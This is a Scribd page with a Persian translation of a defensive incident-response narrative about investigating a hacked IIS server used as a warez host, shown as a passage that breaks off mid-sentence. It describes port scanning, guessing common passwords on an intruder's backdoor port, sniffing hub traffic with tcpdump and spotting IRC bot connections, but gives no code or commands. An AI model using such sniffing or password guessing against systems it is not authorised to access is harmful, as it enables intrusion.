Scribd
Upload
41 views

ﺖﺸﻬﺒﻳﺩﺭﺍ ﻝﻭﺍ ١٣٨٣: Cyrus Peikari, Seth Fogie: ﺎﺑ ﻩﺪﺷ ﻲﺑﺎﻳ ﻪﺸﻳﺭ Tkbot.R00T.Edition.Final

The document discusses a case where a customer's internet connection was slowed due to hackers compromising their server. The author discovered that the main connection server had been repeatedly infected with viruses and hacked by hackers using common vulnerabilities. The hackers were able to take control of the server and use it as a "warez" server hosting over 3GB of illegal software. The author advised cleaning and reinstalling the server from scratch with necessary security updates. Upon investigating the server files, the author found that both the web server and backdoor program were no longer responding, indicating they were no longer active.

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
41 views

ﺖﺸﻬﺒﻳﺩﺭﺍ ﻝﻭﺍ ١٣٨٣: Cyrus Peikari, Seth Fogie: ﺎﺑ ﻩﺪﺷ ﻲﺑﺎﻳ ﻪﺸﻳﺭ Tkbot.R00T.Edition.Final

The document discusses a case where a customer's internet connection was slowed due to hackers compromising their server. The author discovered that the main connection server had been repeatedly infected with viruses and hacked by hackers using common vulnerabilities. The hackers were able to take control of the server and use it as a "warez" server hosting over 3GB of illegal software. The author advised cleaning and reinstalling the server from scratch with necessary security updates. Upon investigating the server files, the author found that both the web server and backdoor program were no longer responding, indicating they were no longer active.

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬


‫» ﻗﺴﻤﺖ ﺳﻮﻡ «‬
‫ﻣﺘﺮﺟﻢ ‪ :‬ﺭﺿﺎ ﻣﺪﺩﻱ‬
‫ﺗﺎﺭﻳﺦ ‪ :‬ﺍﻭﻝ ﺍﺭﺩﻳﺒﻬﺸﺖ ‪١٣٨٣‬‬
‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ‪Cyrus Peikari, Seth Fogie :‬‬

‫ﻫﻤـﻪ ﭼـﻴﺰ ﺑـﺎ ﺗﻤﺎﺱ ﺳﺎﺩﻩ ﻳﻚ ﻣﺸﺘﺮﻱ ﻧﮕﺮﺍﻥ ﺷﺮﻭﻉ ﺷﺪ‪ .‬ﺩﻟﻬﺮﻩ ﻭ ﺷﻜﺎﻳﺖ ﻣﺸﺘﺮﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺯ‬
‫ﺍﻓـﺖ ﺳﺮﻋﺖ ﺍﺗﺼﺎﻝ ﺩﺳﺘﮕﺎﻩ ﺍﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺩ‪ .‬ﺑﺮ ﺍﺳﺎﺱ ﺍﻳﻦ ﻣﻄﻠﺐ ﺳﺎﺩﻩ ﺑﻮﺩ ﻛﻪ ﻣﻦ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﺘﻮﺟﻪ‬
‫ﺷـﺪﻡ ﻛﻪ ﺳﺮﻭﺭ ﺍﺻﻠﻲ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻜﺮﺭﺍ ﻗﺮﺑﺎﻧﻲ ﻭﻳﺮﻭﺱﻫﺎ ﻭ ﻫﻜﺮﻫﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻫﻜﺮﻫﺎ ﺑﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺁﺳﻴﺐﭘﺬﻳﺮ‪ ،‬ﺗﻮﺍﻧﺴﺘﻪ ﺑﻮﺩﻧﺪ ﺑﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ‪ ،IIS‬ﻛﺎﻣﭙﻴﻮﺗﺮ ﻣﺸﺘﺮﻱ ﺭﺍ ﺩﺭ‬
‫ﺍﺧﺘـﻴﺎﺭ ﮔﺮﻓﺘﻪ ﻭ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺁﻥ ﺭﺍ ﺑﻪ ﻳﻚ ﺳﺮﻭﺭ ‪ warez‬ﻛﻪ ﻣﻴﺰﺑﺎﻥ ﺑﻴﺶ ﺍﺯ ‪ ٣‬ﮔﻴﮕﺎﺑﺎﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺍﺳﺖ ﺗﺒﺪﻳﻞ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﺭ ﻧﺘـﻴﺠﻪ ﺁﻧﭽـﻪ ﺩﺭ ﺑﺎﻻ ﮔﻔﺘﻪ ﺷﺪ‪ ،‬ﺑﻪ ﻣﺸﺘﺮﻱ ﻣﺰﺑﻮﺭ ﮔﻔﺘﻢ ﻛﻪ ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎﻳﺪ ﺑﺎ ﻧﺼﺐ ﺗﻤﺎﻡ‬
‫‪ Service Pack‬ﻫـﺎﻱ ﺿﺮﻭﺭﻱ‪ ،‬ﻓﻮﺭﺍ ﺳﺮﻭﺭ ﺭﺍ ﺗﻤﻴﺰ ﻛﺮﺩﻩ ﻭ ﺩﻭﺑﺎﺭﻩ ﺁﻥ ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﺍﺟﺮﺍ ﻛﻨﺪ‪ .‬ﺑﻌﺪ ﺍﺯ ﺑﺤﺚ‬
‫ﻛـﺮﺩﻥ ﺑـﺮ ﺳـﺮ ﺗﻤﻬـﻴﺪﺍﺕ ﻣﺤﺎﻓﻈﺘـﻲ ﻣﻤﻜـﻦ ﺑـﺎ ﻣﺸﺘﺮﻱ‪ ،‬ﺳﺮﻳﻌﺎ ﺑﻪ ﻛﻨﺪ ﻭ ﻛﺎﻭ ﺭﺍﻩ ﺩﻭﺭ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺮﻭﺭ ﻭ‬
‫ﺟﻤـﻊﺁﻭﺭﻱ ﺩﺭ ﺣـﺪ ﻣﻘـﺪﻭﺭ ﺍﻃﻼﻋـﺎﺕ ﻣﻤﻜـﻦ ﺍﺯ ﻣﺘﺪﻫﺎ ﻭ ﺣﻘﻪﻫﺎﻳﻲ ﻛﻪ ﻫﻜﺮﻫﺎ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ‬
‫ﺳـﺮﻭﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ‪ ،‬ﻧﻤﻮﺩﻡ‪ .‬ﺑﻪ ﻫﺮ ﺣﺎﻝ‪ ،‬ﭘﺲ ﺍﺯ ﺣﺪﻭﺩﺍ ﺩﻭ ﺳﺎﻋﺖ ﻛﻨﺪ ﻭ ﻛﺎﻭ‪ ،‬ﺑﻪ ﺳﺮﻋﺖ ﻣﺘﻮﺟﻪ‬
‫ﺍﻳـﻦ ﻣﻄﻠـﺐ ﺷـﺪﻡ ﻛﻪ ﻫﻢ ﺳﺮﻭﺭ ﻭﺏ ﻭ ﻫﻢ ﺑﺮﻧﺎﻣﻪ ﺭﺧﻨﻪ ﭘﺸﺘﻲ ﻣﻦ )‪ ، (Back Door‬ﻫﺮ ﺩﻭ ﺩﻳﮕﺮ ﭘﺎﺳﺨﻲ‬
‫ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﺍﻳـﻨﺠﺎ ﺟﺎﻳـﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ ﻗﻀﻴﻪ ﻭﺍﻗﻌﻲ ﺑﺮﺩﺍﺷﺖ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺪﻭﻥ ﻫﻴﭽﮕﻮﻧﻪ ﺣﺮﻑ‬
‫ﺍﺿﺎﻓﻪﺍﻱ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺗﺎ ﺩﺍﺳﺘﺎﻥ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻴﻢ‪.‬‬

‫ﺭﻳﺸﻪﻳﺎﺑﻲ ﺷﺪﻩ ﺑﺎ ‪Tkbot.R00t.EDITiON.FiNAL‬‬


‫ﺩﺭ ﺁﻧﺠـﺎ ﺑﻮﺩﻳـﻢ ﻛـﻪ ﻣـﻦ ﺑﺪﻭﻥ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺳﺮﻭﺭ ﻣﺎﻧﺪﻩ ﺑﻮﺩﻡ‪ .‬ﺍﻭﻟﻴﻦ‬
‫ﺣﺪﺳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺯﺩﻡ ﺁﻥ ﺑﻮﺩ ﻛﻪ ﺳﺮﻭﺭ ﺗﻮﺳﻂ ﻣﺪﻳﺮ ﺳﺮﻭﺭ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎ ﺍﻧﺠﺎﻡ‬
‫ﻳـﻚ ‪ Ping‬ﻭ ﺍﺳـﻜﻦ ﻛـﺮﺩﻥ ﭘـﻮﺭﺕﻫﺎ ﺑﻪ ﺳﺮﻋﺖ ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﻛﻪ ﺳﺮﻭﺭ ‪ Offline‬ﻧﺒﻮﺩﻩ ﻭ ﺩﺍﺭﺍﻱ ﻓﻌﺎﻟﻴﺖ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺑﺮﻗﺮﺍﺭﻱ ﻳﻚ ﺗﻤﺎﺳﻲ ﺗﻠﻔﻨﻲ ﺑﺎ ﻣﺪﻳﺮ‪ ،‬ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﻛﻪ ﺍﻭ ﻫﻨﻮﺯ ﻫﻴﭻ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻧﺪﺍﺩﻩ ﺍﺳﺖ‪.‬‬

‫‪1‬‬ ‫‪www.WebSecurityMgz.com‬‬
‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ﺑﻄﻮﺭ ﺟﺎﻟﺒﻲ ﻋﻤﻞ ﺍﺳﻜﻦ ﭘﻮﺭﺕﻫﺎ‪ ،‬ﻫﻤﺎﻥ ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕﻫﺎﻱ ﺑﺎﺯ ﻗﺒﻠﻲ ﺭﺍ ﺑﻪ ﺍﺿﺎﻓﻪ ﺩﻭ ﭘﻮﺭﺕ ‪1297‬‬
‫ﻭ ‪ 65130‬ﻭ ﺑﺎ ﻛﺎﻫﺶ ﺩﻭ ﭘﻮﺭﺕ ‪) 80‬ﺳﺮﻭﺭ ﻭﺏ( ﻭ ‪ 99‬ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ‪ ncx99.exe‬ﺍﺳﺖ‪ ،‬ﺑﺎﺯﻣﻲﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﺑـﺎ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺍﻳﻨﻜﻪ ﻫﻴﭻ ﺭﺍﻩ ﺩﻳﮕﺮﻱ ﻧﺪﺍﺷﺘﻢ‪ ،‬ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻢ ﺗﺎ ﺍﺯ ﻃﺮﻳﻖ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪Telnet‬‬
‫ﻭ ‪ FTP‬ﺑـﻪ ﺍﻳـﻦ ﺩﻭ ﭘـﻮﺭﺕ ﺟﺪﻳﺪ ﻣﺘﺼﻞ ﺷﻮﻡ ﺗﺎ ﺑﺒﻴﻨﻢ ﺁﻧﻬﺎ ﭼﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﻨﺪ‪ .‬ﺑﺎ ﺷﮕﻔﺘﻲ ﺑﻪ‬
‫ﻧﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻛﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﺎﺯﻫﻢ ﻗﺮﺑﺎﻧﻲ ﻫﻜﺮ ﺩﻳﮕﺮﻱ ﺷﺪﻩ ﺍﺳﺖ )ﻫﻤﺎﻧﻄﻮﺭﻱ ﻛﻪ ﺩﺭ ﺷﻜﻞ ﺷﻤﺎﺭﻩ‬
‫‪ ١‬ﻣـﻲﺑﻴﻨـﻴﺪ(‪ .‬ﺑـﺎ ﺍﻳـﻦ ﺣـﺎﻝ ﺩﺭ ﺍﻳـﻦ ﻣﻮﺭﺩ‪ ،‬ﻫﻜﺮ ﺑﻪ ﭘﺎﻙ ﻛﺮﺩﻥ ﺭﻭﺵﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻫﻜﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻱ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩ‪ ،‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪.‬‬

‫ﺷﻜﻞ ‪١‬‬
‫ﺍﺗﺼﺎﻝ ‪ TelNet‬ﺑﻪ ﭘﻮﺭﺕ ‪ 65130‬ﺩﺭ ﺳﺮﻭﺭ ﻫﻚ ﺷﺪﻩ‬

‫ﺑﻌـﺪ ﺍﺯ ﭼﻨﺪﻳـﻦ ﻣـﻮﺭﺩ ﺗـﻼﺵ ﺑـﺮﺍﻱ ﺣـﺪﺱ ﺯﺩﻥ ﻛﻠﻤﺎﺕ ﻋﺒﻮﺭ ﮔﻮﻧﺎﮔﻮﻥ ﻣﺘﺪﺍﻭﻝ‪ ،‬ﺩﻭﺑﺎﺭﻩ ﺑﺎ ﻣﺪﻳﺮ‬
‫ﺳـﺮﻭﺭ ﺗﻤـﺎﺱ ﮔﺮﻓـﺘﻢ ﺗـﺎ ﺩﺭﺑﺎﺭﻩ ﺁﺧﺮﻳﻦ ﺍﺗﻔﺎﻗﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﻭﻱ ﺑﺎﺧﺒﺮ ﺷﻮﻡ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﺍﻳﻦ ﺗﻤﺎﺱ ﺍﺯ ﺍﻭ‬
‫ﺑﺮﺍﻱ ﻛﻨﺪ ﻭ ﻛﺎﻭ ﺳﺮﻭﺭ ﺩﺭ ﺳﺎﻳﺘﻲ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺩﺭ ﺁﻧﺠﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩ ﺍﺟﺎﺯﻩ ﺧﻮﺍﺳﺘﻢ ﻭ ﺩﺭﺧﻮﺍﺳﺖ ﻛﺮﺩﻡ‬

‫‪2‬‬ ‫‪www.WebSecurityMgz.com‬‬
‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ﺗـﺎ ﺍﻃﻼﻋﺎﺗـﻲ ﺍﺯ ﺷﻨﺎﺳـﻪ ﻋـﺒﻮﺭ )‪ (Account‬ﻣﺪﻳـﺮ ﺭﺍ ﻛـﻪ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬

‫ﺷﺮﻭﻉ ﺑﺎﺯﻱ‪ :‬ﺭﻭﺯ ﺩﻭﻡ‪ ،‬ﺑﻌﺪﺍﺯﻇﻬﺮ‬


‫ﺗـﺎ ﺑﻌﺪﺍﺯﻇﻬـﺮﻱ ﻛـﻪ ﺩﺭ ﭘـﻴﺶ ﺍﺳـﺖ ﻧﻤـﻲﺗﻮﺍﻧﻢ ﺑﻪ ﺳﺎﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻢ‪ .‬ﺑﺎ ﺍﻳﻦ ﺣﺎﻝ ﺍﺯ‬
‫ﺯﻣﺎﻧـﻲ ﻛـﻪ ﺗـﺎ ﺁﻥ ﻣﻮﻗﻊ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻡ ﺑﺮﺍﻱ ﻃﺮﺍﺣﻲ ﻳﻚ ﺭﻭﺵ ﺍﺣﺘﻤﺎﻟﻲ ﺟﻬﺖ ﺭﺳﻴﺪﻥ ﺑﻪ ﻫﺪﻓﻢ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻢ‪ .‬ﭘﺲ ﺍﺯ ﺗﻔﻜﺮ ﺩﺭﺑﺎﺭﻩ ﺍﻧﺘﺨﺎﺏﻫﺎﻱ ﻣﻮﺟﻮﺩ‪ ،‬ﺑﺮﺍﻳﻢ ﻣﺸﺨﺺ ﺷﺪ ﻛﻪ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺭﺳﻴﺪﻥ ﺑﻪ ﺭﻭﺷﻲ ﻛﻪ‬
‫ﻫﻜـﺮ ﺍﺯ ﻃـﺮﻳﻖ ﺁﻥ ﺗﻮﺍﻧﺴﺘﻪ ﺑﺮﻧﺎﻣﻪ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﻧﺼﺐ ﻛﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻧﻢ ﻳﻜﻲ ﺍﺯ ﻛﻠﻤﺎﺕ‬
‫ﻋـﺒﻮﺭ ‪ Telnet‬ﻳـﺎ ‪ Ftp‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺗﻮﺳﻂ ﻫﻜﺮ ﺑﻪ ﻫﻨﮕﺎﻡ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻡ‪ .‬ﻫﻤﭽﻨﻴﻦ‬
‫ﺑـﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺮﺩﻡ ﺗـﺎ ﻧﮕﺎﻫـﻲ ﺩﻗـﻴﻖ ﺑﻪ ‪ Log‬ﻓﺎﻳﻞﻫﺎ ﻭ ﻓﺎﻳﻞ ﺳﻴﺴﺘﻤﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻢ ﺗﺎ ﺑﺒﻴﻨﻢ ﻣﻲﺗﻮﺍﻥ‬
‫ﺗﻐﻴﻴﺮﺍﺗـﻲ ﻣـﺮﺑﻮﻁ ﺑـﻪ ﺍﻳﻦ ﻣﺨﻤﺼﻪ ﺭﺍ ﺩﺭ ‪ ٢٤‬ﺳﺎﻋﺖ ﮔﺬﺷﺘﻪ ﺁﻧﻬﺎ ﭘﻴﺪﺍ ﻛﺮﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑﺎ ﺁﻧﻜﻪ ﺍﻳﻦ ﮔﺎﺭ ﻣﺎﻧﻨﺪ‬
‫ﺍﻧﺪﺍﺧﺘـﻦ ﺗﻴﺮﻱ ﺩﺭ ﺗﺎﺭﻳﻜﻲ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻧﻬﺎﻳﺖ ﺑﻪ ﺑﻬﺘﺮﻳﻦ ﻭﺟﻪ ﻭ ﺑﻄﻮﺭ ﺟﺎﻟﺒﻲ ﭘﺎﺳﺨﻲ ﺑﻪ ﻣﻦ ﺩﺍﺩ ﻛﻪ ﺍﺻﻼ‬
‫ﺑﻪ ﺩﻧﺒﺎﻝ ﺁﻥ ﻧﺒﻮﺩﻡ‪.‬‬

‫ﻫﻨﮕﺎﻣـﻲ ﻛﻪ ﺑﻪ ﺳﺎﻳﺖ ﺭﺳﻴﺪﻡ‪ ،‬ﻓﻮﺭﺍ ﻛﺎﺭﮔﺎﻩ ﺭﺍ ﺑﺮﭘﺎ ﻛﺮﺩﻡ‪ .‬ﺍﺯ ﺁﻧﺠﺎﻳﻲ ﻛﻪ ﺳﺎﻳﺖ ﺩﺭ ﻋﻮﺽ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ‪ ،‬ﺍﺯ ﺷﺒﻜﻪ ﻣﺒﺘﻨﻲ ﺑﺮ ﻫﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﺗﺼﺎﻝ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﻤﺮﺍﻫﻢ ﺑﻪ‬
‫ﺷﺒﻜﻪ ﺑﻮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﻃﺮﻳﻖ ﻣﻲﺗﻮﺍﻧﺴﺘﻢ ﺩﺯﺩﻱ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﺭﺍ ﺁﻏﺎﺯ ﻛﻨﻢ‪.‬‬

‫ﻫـﺎﺏﻫﺎ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﻪ ﺳﻮﻱ ﻫﻤﻪ ﭘﻮﺭﺕﻫﺎ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻫﻤﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ﺗﺎ‬
‫ﺧـﻮﺩ ﺗﺸـﺨﻴﺺ ﺩﻫـﻨﺪ ﻛـﻪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ‪ ،‬ﺳﻮﺋﻴﭻﻫﺎ ﺑﺮ‬
‫ﺁﺩﺭﺱ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻫﺮ ﺍﺑﺰﺍﺭ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﻈﺎﺭﺕ ﻛﺮﺩﻩ ﻭ ﻓﻘﻂ ﺩﺭ ﺻﻮﺭﺗﻲ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺑﻪ ﭘﻮﺭﺗﻲ‬
‫ﻣﻲﻓﺮﺳﺘﻨﺪ ﻛﻪ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﭘﻮﺭﺕ ﺑﺮﻭﺩ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ‬
‫ﺭﺍ ﺑﺎ ﻛﻤﻲ ﻣﺸﻜﻞ ﻭ ﭼﺎﻟﺶ ﻣﻮﺍﺟﻪ ﻣﻲﺳﺎﺯﺩ‪.‬‬

‫ﻫـﺪﻑ ﻣـﻦ ﺍﻳـﻦ ﺑﻮﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻛﻨﻢ ﻭ ﺳﭙﺲ ﺩﺭ ﻣﻮﻋﺪ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺭﺍ ﺁﻧﺎﻟﻴﺰ ﻛﻨﻢ‪.‬‬
‫ﺑـﺮﺍﻱ ﺗﺴـﻬﻴﻞ ﺍﻳﻦ ﻛﺎﺭ‪ Tcpdump ،‬ﺭﺍ ﺑﺮ ﺭﻭﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻡ ﻛﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ‪ Linux‬ﺑﺮ ﺭﻭﻱ ﺁﻥ ﺩﺭ ﺣﺎﻝ‬
‫ﺍﺟﺮﺍ ﺑﻮﺩ‪ ،‬ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﻭ ﺁﻥ ﺭﺍ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﺍﻃﻼﻋﺎﺕ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻫﺎﺭﺩ ﺗﻈﻴﻢ ﻛﺮﺩﻡ‪ .‬ﺑﺎ‬
‫ﺍﻧﺠـﺎﻡ ﺍﻳﻦ ﻛﺎﺭ‪ ،‬ﺷﺮﻭﻉ ﺑﻪ ﺟﺴﺘﺠﻮ ﺩﺭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ‪ ،‬ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﻭ ﺳﺮﻭﻳﺲﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﻭ ﺍﺟﺮﺍ‬
‫ﺷﺪﻩ ﺳﺮﻭﺭ ﻧﻤﻮﺩﻡ‪.‬‬

‫‪3‬‬ ‫‪www.WebSecurityMgz.com‬‬
‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ﻣـﻦ ﺑـﺎ ‪ NetStat‬ﻛـﻪ ﺍﻃﻼﻋﺎﺗـﻲ ﺭﺍﺟـﻊ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺧﻮﺩ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ ،‬ﺷﺮﻭﻉ‬
‫ﻛـﺮﺩﻡ‪ .‬ﻫﻤـﺎﻥﻃـﻮﺭ ﻛـﻪ ﺩﺭ ﺷـﻜﻞ ﺷـﻤﺎﺭﻩ ‪ ٢‬ﻣـﻲﺑﻴﻨﻴﺪ‪ ،‬ﭼﻨﺪﻳﻦ ﺍﺗﺼﺎﻝ ﻣﺸﻜﻮﻙ ﺑﺴﻴﺎﺭ ﻭﺍﺿﺢ ﺑﻮﺩﻧﺪ )ﺑﻪ‬
‫ﺍﺭﺗـﺒﺎﻃﺎﺕ ﺑـﺎ ﺳـﺮﻭﺭﻫﺎﻱ ‪ IRC‬ﺗﻮﺟـﻪ ﻛﻨـﻴﺪ‪ ، (.‬ﺳﭙﺲ ﺑﻪ ﻓﻬﺮﺳﺖ ‪ Task‬ﻛﻪ ﻟﻴﺴﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺩﺭ ﺣﺎﻝ‬
‫ﺍﺟﺮﺍﻱ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻧﮕﺎﻫﻲ ﺍﻧﺪﺍﺧﺘﻢ‪ .‬ﻣﺘﻮﺟﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﻏﻴﺮ ﻣﻌﻤﻮﻝ ﺑﺎ ﻧﺎﻡ ‪FireDaemon‬‬
‫ﺷـﺪﻡ‪ .‬ﺑﻌـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺟﺴـﺘﺠﻮﻳﻲ ﻛـﻪ ﺩﺭ ﻫﻤـﺎﻥ ﻣﻮﻗـﻊ ﺑﻪ ﺻﻮﺭﺕ ‪ Online‬ﺍﻧﺠﺎﻡ ﺩﺍﺩﻡ ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﻛﻪ‬
‫‪ FireDaemon‬ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻤﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺍﺳﻜﺮﻳﭙﺖ )ﻣﺎﻧﻨﺪ‬
‫‪ (Python ، Java ، Perl ، BAT/CMD‬ﺫﺍﺗـﺎ ﻣـﺮﺑﻮﻁ ﺑﻪ ‪ Win32‬ﺭﺍ ﺑﻄﻮﺭ ﻣﺠﺎﺯﻱ ﻣﺎﻧﻨﺪ ﻳﻚ ﺳﺮﻭﻳﺲ‬
